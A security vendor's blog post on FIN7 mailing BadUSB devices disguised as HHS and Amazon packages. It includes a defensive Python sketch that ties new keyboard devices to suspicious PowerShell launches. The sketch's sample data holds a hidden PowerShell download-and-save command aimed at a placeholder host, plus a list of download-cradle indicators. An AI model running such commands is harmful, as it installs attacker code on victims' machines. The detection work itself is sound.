BadUSB Devices

Chris Swagler | January 18th, 2022


The United States Federal Bureau of Investigation (FBI) reported that the infamous FIN7 cybercrime group, behind the Darkside and BlackMatter ransomware operations, is sending malicious BadUSB devices to US companies hoping to infect their systems with malware and set the stage for future cyberattacks. Several packages containing LilyGO-branded BadUSB devices were sent using the United States Postal Service (USPS) and United Parcel Service (UPS) to several US businesses in the transportation, insurance, and defense industries. One set of packages imitating the US Department of Health and Human Services (HHS) contains letters referencing COVID-19 guidelines with a poisoned USB device inside. Another set of packages imitating Amazon comes disguised as a decorative gift box containing a fake thank-you letter, a counterfeit gift card, and a USB device.

FIN7 Target Companies Using BadUSB Devices

According to the FBI, if people who received the packages plug the BadUSB devices into their computers, the BadUSB attack is executed. Each BadUSB device registers itself as a keyboard and sends a series of pre-configured automated keystrokes to the user’s PC. The keystrokes run PowerShell commands to download and install various malware strains that act as backdoors into the victim’s networks for the threat operators. According to the investigation, the ransomware operators can then obtain administrative access and move laterally to other local systems.
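The attack chain above has a distinctive shape on the endpoint: a new keyboard-class HID device appears, and seconds later PowerShell starts from the interactive session with download or hidden-window flags. The following detection sketch is an added example, not code from the original post or from SpearTip; it assumes a collector has already flattened Windows Kernel-PnP device events and process-creation events into the flat records shown, and the sample events are constructed.

```python
from datetime import datetime, timedelta

# Constructed sample telemetry (not real data). Assumption: a log collector has already
# flattened Windows Kernel-PnP "device configured" events and Security 4688 / Sysmon 1
# process-creation events into these flat records.
EVENTS = [
    {"ts": "2022-01-18T09:00:00", "kind": "device", "class": "Keyboard",
     "device_id": r"HID\VID_1A86&PID_7523\6&2A3B"},          # new HID keyboard appears
    {"ts": "2022-01-18T09:00:07", "kind": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iwr http://example.invalid/x -OutFile $env:TEMP\\x.exe"'},
    {"ts": "2022-01-18T10:15:00", "kind": "device", "class": "Keyboard",
     "device_id": r"HID\VID_046D&PID_C31C\7&1"},             # ordinary keyboard, nothing follows
    {"ts": "2022-01-18T11:40:00", "kind": "process", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\scripts\backup.ps1"},  # scheduled task, benign
]

# Command-line traits typical of keystroke-injected download cradles (lower-case).
SUSPICIOUS = ("-w hidden", "-windowstyle hidden", "-enc", "-ep bypass",
              "invoke-webrequest", "iwr ", "downloadstring", "net.webclient", "iex ")

def _ts(s):
    return datetime.fromisoformat(s)

def correlate(events, window=timedelta(seconds=60)):
    """Flag PowerShell launches carrying suspicious traits that start within `window`
    after a keyboard-class HID device was configured on the same host."""
    arrivals = [(_ts(e["ts"]), e["device_id"]) for e in events
                if e["kind"] == "device" and e["class"] == "Keyboard"]
    alerts = []
    for e in events:
        if e["kind"] != "process" or not e["image"].lower().endswith("powershell.exe"):
            continue
        hits = [s for s in SUSPICIOUS if s in e["cmdline"].lower()]
        if not hits:
            continue
        started = _ts(e["ts"])
        for seen, dev in arrivals:
            delay = started - seen
            if timedelta(0) <= delay <= window:   # only look forward from the arrival
                alerts.append({"device_id": dev, "delay_s": int(delay.total_seconds()),
                               "parent": e["parent"], "indicators": hits,
                               "cmdline": e["cmdline"]})
    return alerts

if __name__ == "__main__":
    for a in correlate(EVENTS):
        print(f"ALERT: {a['device_id']} -> PowerShell after {a['delay_s']}s "
              f"(parent {a['parent']}): {', '.join(a['indicators'])}")
```

The parent process is carried into the alert because keystroke-launched commands arrive via the interactive shell (explorer.exe), which separates them from PowerShell started by scheduled tasks or management agents.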

The FIN7 threat actors utilize various tools, including Metasploit, Cobalt Strike, PowerShell scripts, Carbanak, GRIFFON, DICELOADER, and TIRION to deploy ransomware, including BlackMatter and REvil, on compromised networks.

In November 2021, the FIN7 group used the Amazon thank-you letter trick to target a United States defense industry company. The group also sent malicious BadUSB devices to a United States hospitality provider in an earlier campaign that a security firm uncovered in March 2020. The FBI included images of the Amazon thank-you letter, the HHS COVID-19 alert, and the LilyGO-branded BadUSB device in its alert.

The recent attacks demonstrate the innovation of cybercriminals and their determination to target victims in critical industries. It’s crucial for companies of every size to remain alert to the current threat landscape and take the necessary measures to improve their network security infrastructure. At SpearTip, our certified engineers at our Security Operations Centers work in a continuous investigative cycle and are ready to respond to incidents, like those perpetrated by FIN7, at a moment’s notice. Our ShadowSpear Platform is an unparalleled resource with endpoint detection and response capabilities that prevent ransomware attacks from impacting companies. ShadowSpear optimizes visibility to identify threats, neutralize malware, and counter adversaries in real time.

If your company is experiencing a breach, call our Security Operations Centers at 833.997.7327 to speak directly with an engineer.
